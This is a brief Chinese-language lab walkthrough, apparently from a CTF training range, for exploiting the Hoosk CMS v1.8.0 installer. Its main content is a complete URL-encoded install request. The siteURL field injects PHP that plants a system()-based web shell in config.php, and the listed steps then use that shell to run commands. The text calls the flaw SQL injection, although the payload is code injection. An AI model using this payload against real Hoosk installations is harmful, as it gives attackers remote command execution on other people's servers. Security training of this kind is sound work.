靶标介绍:
Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞
漏洞复现过程
1.开启靶场
http://eci-2ze0ryypd38asmkmcnf4.cloudeci1.ichunqiu.com/install/
2.安装hoosk
Payload:
siteName=test&siteURL=http%3A//baidu.com/%27%29%3Bif%28%24_REQUEST%5B%27s%27%5D%29%20%7B%0A%20%20system%28%24_REQUEST%5B%27s%27%5D%29%3B%0A%20%20%7D%20else%20phpinfo%28%29%3Bexit%28%29%3B//&dbName=mysql&dbUserName=root&dbPass=root&dbHost=localhost
3.写入一句话木马到config.php
4.查看首页
5.执行命令